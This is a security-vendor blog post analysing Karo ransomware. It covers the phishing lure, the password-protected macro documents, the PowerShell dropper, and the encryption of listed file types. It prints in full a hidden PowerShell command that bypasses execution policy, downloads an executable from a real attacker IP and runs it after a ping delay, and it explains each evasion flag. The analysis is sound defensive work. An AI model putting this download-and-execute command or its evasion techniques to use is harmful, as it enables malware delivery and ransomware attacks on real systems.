Recent Posts

Recent Blog Posts

The PhishLabs Blog

Not NotPetya (An analysis of Karo Ransomware)


While there was a lively running debate over whether it was Petya or NotPetya yesterday, we all can all agree that what locked up some of the world’s largest shipping companies, spread through the infamous SMB exploit, and may have been delivered as an infected update, was not Karo. However, this obscure ransomware family was launched into the spotlight due to early confusion over Petya's initial infection vector.

Early reports of the first Petya infections cited a potential infection vector of an email purporting to be an applicant’s curriculum vitae linking to a malicious executable stored on DropBox. At the same time, Karo happened to be circulating using Microsoft Office documents titled with the intended recipient’s email, often their first and last name. To many researchers, like myself, JohnDoe.doc looks like a CV. So, while your inboxes and Twitter feeds are filled with Petya/NotPetya, we’re going to take a closer look at the accidental celebrity, Karo.

Initial Email

Karo showed up in our feeds yesterday morning with a typical lure. The threat actor generated pseudo-random emails from a small set of parameters that urge the potential victim to open the attachment to find out about their pending few thousand dollars charge. Several popular malware delivery social engineering tactics are present in this lure, all serving to add legitimacy to the millisecond evaluation we do before opening an attachment. Each part of a lure can be broadly broken down into pieces that add legitimacy and those that are red flags, allowing for a loose score of the lure’s social engineering strength.

 Karo Lure.png

Karo lure body with multiple possible parameters listed.

The attacker adds authenticity to the lure with the following tactics:

  1. Sends from a well-known email provider associated with businesses 
  2. Uses the victim’s name in the subject and salutation
  3. Includes a charge amount that is large enough, but not unrealistic, to warrant immediate action and perhaps make the potential victim overlook some of the email’s red flags

There are some red flags that indicate the contents of the email should not be trusted.  These include: 

  1. ‘Hey’ is not a contextually appropriate salutation
  2. An email warning about an imminent charge detailed in an attachment is not credit card company standard operating procedure
  3. The sender’s name and email do not match
  4. There is no contact information below the signature

 

Attachment

The Office document payloads attached to Karo emails are password protected. While not common in malware spam, password protected Office documents were employed in several TrickBot campaigns earlier this year. Using password protection may make antivirus evasion easier, but its lack of widespread adoption indicates it likely results in a lower infection rate.

 Karo VT Scan.png

VirusTotal scan of password protected Karo dropper.

If the malicious document is opened and the password, which appears to be the same for all documents in this campaign, is entered, the victim is asked to enable macros. The document warns the user that as it is ‘protected’ they must open it on a PC and enable content.

Karo Word Doc.png

Opened Karo document.

Download & Execution

The enabled macro opens cmd.exe and executes a Powershell command that calls the ransomware’s payload. Powershell is commonly used by malware families to download and install themselves onto a victim’s machine. The command below contains all the functionality to initiate and execute Karo without any further user interaction.

Cmdline: powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://185.165.29.78/~alex/svchost.exe' , 'C:\Users\SBOX~1\AppData\Local\Temp\svchost.exe')& PING -n 15 127.0.0.1>nul & %tmp%\svchost.exe

The best way to explore how it can pull this off is by dissecting the various parts of the above command.

powershell.exe -w hidden -nop –ep

The first step is starting Powershell, which is entered into the command line as powershell.exe.  Next in the command are several arguments which help the ransomware bypass protection and operate unnoticed:

–w hidden, makes the command executed in the background

–nop, the shortened version of no profile stops powershell from loading the current users profile

–ep bypass, or execution policy bypass, which circumvents security policies which normally prevent or warn of running downloaded programs.

Download

Now that Powershell has cleared the way, it starts System.Net.Webclient which will reach out and grab the payload from the DownloadFile URL.

(New-Object System.Net.WebClient)
.DownloadFile('http://185.165.29.78/~alex/svchost.exe'

The last part of the command is the location where Powershell delivers the downloaded program.

'C:\Users\SBOX~1\AppData\Local\Temp\svchost.exe'

Many malware families will play around with file extensions to further disguise their nefarious purpose. The executable is saved and labeled on the server and in the command as a .png or .jpg, but is saved as, and run, as an executable.

Execution

At this point, Karo is sitting in the victim’s temp directory awaiting its order to start, which comes from the second half of the command:

 & PING -n 15 127.0.0.1 >nul

This section instructs the computer to ping itself 15 times before continuing with the command’s instructions. This is often done by threat actors to delay the execution of their malware to trick sandboxes and researchers into thinking nothing is happening and confirm internet connectivity. If the ping is successful and therefore greater than null, the final part of the command is run. 

%tmp%\svchost.exe

This starts the ransomware downloaded at the beginning of the command and encryption begins.

Encryption

Karo Encrypt.png

Karo’s .NET encryption method.

 Karo, coded in .NET, uses the on-board RijndaelManaged  class to encrypt files using the following extensions:

.txt

.sql

.cs

.cpp

.text

.js

.html

.java

.pl

.c

.mdb

.ruby

.jpg

.png

.bmp

.doc

.csv

.xls

.docx

.docm

.ppt

And appends them with the extension “.ipygh.” These twenty-one file types do a thorough job of encrypting all files likely valuable to a user but leaving the functionality to pay the ransom and restore and get them restored. Encrypting office document and picture file extensions is standard practice for ransomware, but Karo stands out with its inclusion of multiple programming language source files. Few users have .ruby or C++ files sitting on their computer and Python’s .py was curiously excluded from the list.

Conclusion

While neither Petya nor NotPetya, Karo is an interesting piece of malware. It cobbles together the tactics, techniques, and procedures of other more prevalent strains of ransomware and appears, yesterday at least, to have put the world on lockdown. If the author behind it follows their usual pattern, we will likely see Karo again in a few months. I am sure the authors are hoping they do not time their campaign to launch at the same time as a record setting campaign that had the world talking about ransomware.

Topics: Ransomware

   

What's this all about?

The PhishLabs Blog is where we share our insights and thoughts on cybercrime and online fraud.

Recent Posts

Upcoming Events

Calendar_Mock_

Posts by Topic

see all